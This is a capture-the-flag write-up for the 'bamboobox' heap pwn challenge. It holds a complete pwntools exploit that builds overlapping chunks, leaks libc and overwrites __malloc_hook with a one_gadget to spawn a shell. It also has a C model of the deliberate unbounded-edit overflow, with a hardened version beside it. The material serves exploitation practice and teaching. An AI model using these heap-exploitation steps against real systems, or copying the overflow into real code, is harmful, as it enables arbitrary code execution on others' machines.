BUU PWN hitcontraining_bamboobox

  I originally wanted to practise house of force, but ended up solving it without it... I used three methods for this challenge.

  1.fastbins attack

  2.unlink

  3.house of force

  The GOT is writable, and the program lets you overflow the chunk during edit.

fastbins attack

  Overflow to rewrite the size field and build overlapping chunks, leak libc, overwrite the fd pointer, use realloc to adjust the stack frame, and hit __malloc_hook to get a shell. Standard procedure, so I'll just paste the exp.

```python
# Python 2 / pwntools exploit for the BUU bamboobox binary (glibc 2.23 libc)
from pwn import *

p = process('./pwn')
libc = ELF('./libc.so.6')
context.log_level = 'debug'

def duan():
    # debugging helper: attach gdb and pause
    gdb.attach(p)
    pause()

def add(size, content):
    # menu 2: allocate an item of `size` bytes and write `content` into it
    p.sendlineafter('choice:', '2')
    p.sendlineafter('name:', str(size))
    p.sendafter('item:', content)

def show():
    # menu 1: print every item
    p.sendlineafter('choice:', '1')

def edit(index, size, content):
    # menu 3: rewrite item `index` with `size` bytes; size is not bounded (the overflow)
    p.sendlineafter('choice:', '3')
    p.sendlineafter('item:', str(index))
    p.sendlineafter('name:', str(size))
    p.sendafter('item:', content)

def delete(index):
    # menu 4: free item `index`
    p.sendlineafter('choice:', '4')
    p.sendlineafter('item:', str(index))

og = [0x45226, 0x4527a, 0xf0364, 0xf1207]   # one_gadget offsets for this libc

add(0x20, 'aaaaaaaa')   # index 0
add(0x20, 'bbbbbbbb')   # index 1
add(0x60, 'cccccccc')   # index 2
add(0x10, 'cccccccc')   # index 3

# overflow from item 0 into item 1's header: size 0xa1 now spans items 1 and 2
edit(0, 0x30, 'a'*0x20 + p64(0) + p64(0xa1))
delete(1)               # the forged 0xa0 chunk goes into the unsorted bin
add(0x20, 'aaaaaaaa')   # split it; the 0x70 remainder stays in the unsorted bin, overlapping item 2
show()                  # item 2 now holds the unsorted-bin fd/bk pointing into main_arena
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 88 - 0x10 - libc.symbols['__malloc_hook']
malloc_hook = libc_base + libc.symbols['__malloc_hook']
realloc = libc_base + libc.symbols['realloc']
print 'libc_base-->' + hex(libc_base)
print 'malloc_hook-->' + hex(malloc_hook)
shell = libc_base + og[3]

add(0x60, 'bbbbbbbb')   # index 4: takes the 0x70 remainder, same memory as item 2
delete(4)               # 0x70 chunk into the fastbin
edit(2, 0x10, p64(malloc_hook-0x23))   # overwrite its fd through the overlapping item 2
add(0x60, 'aaaaaaaa')   # takes the real chunk back
# the next allocation lands on the fake chunk at malloc_hook-0x23:
# pad, then __realloc_hook = one_gadget and __malloc_hook = realloc+20 (stack adjust)
add(0x60, 'a'*(0x13-0x8) + p64(shell) + p64(realloc+20))
p.sendlineafter('choice:', '2')     # one more malloc fires the hooks
p.sendlineafter('name:', str(0x10))
p.interactive()
```
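For reference, here is an added C model of the edit bug the exp relies on, with a hardened version beside it. This is not the challenge's source or the author's code; the item list layout, MAX_ITEMS and the function names (item_add, item_edit_vuln, item_edit_safe, item_delete, item_name) are assumptions for illustration.

```c
#include <stdlib.h>
#include <string.h>
/* Minimal model of a bamboobox-style item list; the layout is an assumption
 * for illustration, not the challenge binary's source. Each slot records the
 * length handed to malloc together with the chunk pointer it returned. */
#define MAX_ITEMS 8

struct item {
    size_t len;   /* allocation length recorded at add() time */
    char  *buf;   /* heap chunk holding the item name */
};
static struct item items[MAX_ITEMS];

/* add: allocate a chunk of the requested size and copy the name into it. */
int item_add(int idx, size_t len, const char *name, size_t name_len) {
    if (idx < 0 || idx >= MAX_ITEMS || items[idx].buf != NULL || len == 0) return -1;
    items[idx].buf = calloc(1, len);
    if (items[idx].buf == NULL) return -1;
    items[idx].len = len;
    memcpy(items[idx].buf, name, name_len < len ? name_len : len);
    return 0;
}

/* Vulnerable edit: the copy length comes from the caller and is never checked
 * against items[idx].len, so a longer edit runs past the chunk into the next
 * chunk's size field (the write-up's edit(0, 0x30, ...)). Never call it with len > items[idx].len. */
int item_edit_vuln(int idx, size_t len, const char *data) {
    if (idx < 0 || idx >= MAX_ITEMS || items[idx].buf == NULL) return -1;
    memcpy(items[idx].buf, data, len);   /* unbounded copy: heap overflow */
    return (int)len;
}

/* Hardened edit: clamp the copy to the length recorded at allocation time so
 * an edit can never spill into adjacent chunk metadata. Returns bytes written. */
int item_edit_safe(int idx, size_t len, const char *data) {
    if (idx < 0 || idx >= MAX_ITEMS || items[idx].buf == NULL) return -1;
    size_t n = len < items[idx].len ? len : items[idx].len;
    memcpy(items[idx].buf, data, n);
    return (int)n;
}

/* delete: free the chunk and clear the slot so the pointer cannot be reused. */
int item_delete(int idx) {
    if (idx < 0 || idx >= MAX_ITEMS || items[idx].buf == NULL) return -1;
    free(items[idx].buf);
    items[idx].buf = NULL; items[idx].len = 0;
    return 0;
}
const char *item_name(int idx) { return (idx < 0 || idx >= MAX_ITEMS) ? NULL : items[idx].buf; }
```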

posted @ 2021-01-21 13:05 不会修电脑